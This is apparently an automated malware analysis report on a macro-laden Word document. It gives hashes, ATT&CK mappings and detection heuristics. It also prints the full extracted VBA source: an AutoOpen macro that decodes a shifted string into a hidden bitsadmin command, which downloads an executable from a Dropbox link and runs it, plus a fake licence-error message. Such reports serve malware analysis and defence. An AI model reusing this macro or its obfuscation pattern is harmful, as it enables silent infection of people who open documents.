Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d8ad63d513a9b6f…

MALICIOUS

Office (OLE)

109.0 KB Created: 2017-05-09 08:23:00 First seen: 2018-01-23
MD5: db1dda0772c81f143e71e55da4564d95 SHA-1: 7217dd2c9da7dd0129fefaecd65a98561a3c4010 SHA-256: 0d8ad63d513a9b6f03056a3134b3c258610771388215e2c5e7b08233bf2b1ad6
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that uses Shell() to execute a command. The document body explicitly instructs the user to 'Enable editing' and 'Enable Content' to view the content, which is a common lure for macro-based malware. The executed command appears to be obfuscated but likely downloads and executes a second-stage payload.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2241 bytes
SHA-256: 3a44f5417aaac91dd9399d9437db760556280b51430005a544c5e175bcbacae6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private Function BJDFII(DMVHUMNNKWLKYNFJKZZ As String)
  BJDFII = KEFOPCWZEFEYLRFJIASOHJU(DMVHUMNNKWLKYNFJKZZ, 3)
End Function
Sub AutoOpen()
    Dim DUHNOTHWNMULUJGMOGKLPM, MAXKERVKRSBMM As String
    DUHNOTHWNMULUJGMOGKLPM = DUHNOTHWNMULUJGMOGKLPM & BJDFII("fpg1h{h 2f %zdlwiru 2w 8 \NHU") & BJDFII("T ) elwv") & BJDFII("dgplq 2wudqvihu XNHI 2grzqor") & BJDFII("dg 2sulrulw|") & BJDFII(" ") & BJDFII("qrupdo kwwsv=") & BJDFII("22zzz1gurser{1frp2v2}|tdgu{t{t")
    DUHNOTHWNMULUJGMOGKLPM = DUHNOTHWNMULUJGMOGKLPM & BJDFII(";df3v24th") & BJDFII("v|r}dqdqulyr{lw|ri1h{hBgo@") & BJDFII("4 (dssgdwd") & BJDFII("(_giyxdx1h{h )vwduw (ds") & BJDFII("sgdwd") & BJDFII("(_giyxdx1h{h%")

    MAXKERVKRSBMM = MAXKERVKRSBMM & BJDFII("Huuru 4<;:7= \rx pxvw kdyh ") & BJDFII("Riilfh Suri") & BJDFII("hvvlrqdo Hglwlrq wr uhdg w") & BJDFII("klv frqwhqw/ sohdv") & BJDFII("h xsjudgh |rxu ") & BJDFII("olfhqfh1 Y")
    MAXKERVKRSBMM = MAXKERVKRSBMM & BJDFII("lvlw zzz1plfurvr") & BJDFII("iw1frp iru khos")
    
    Shell DUHNOTHWNMULUJGMOGKLPM, vbHide
    MsgBox MAXKERVKRSBMM
End Sub
Private Function KEFOPCWZEFEYLRFJIASOHJU(ByVal WXEUXHRSNGRBJW As String, ByVal RKRTVCUTLKVCVV As Long) As String
    Dim IIGCXHRYYPJ, PBOFTYOOET, AMTKKERYVJTIORREI As Long
    IIGCXHRYYPJ = Len(WXEUXHRSNGRBJW)
    Dim FLBYNNCHXAHAYTAKSVDVZRJN As String
    Dim RICLLCJ() As Long
    ReDim RICLLCJ(1 To IIGCXHRYYPJ)
    For AMTKKERYVJTIORREI = 1 To IIGCXHRYYPJ
        PBOFTYOOET = Asc(Mid(WXEUXHRSNGRBJW, AMTKKERYVJTIORREI, 1))
        If PBOFTYOOET = 32 Then
            RICLLCJ(AMTKKERYVJTIORREI) = PBOFTYOOET
        Else:
            PBOFTYOOET = PBOFTYOOET - RKRTVCUTLKVCVV
            RICLLCJ(AMTKKERYVJTIORREI) = PBOFTYOOET
        End If
        FLBYNNCHXAHAYTAKSVDVZRJN = FLBYNNCHXAHAYTAKSVDVZRJN & Chr(RICLLCJ(AMTKKERYVJTIORREI))
    Next
    KEFOPCWZEFEYLRFJIASOHJU = FLBYNNCHXAHAYTAKSVDVZRJN
End Function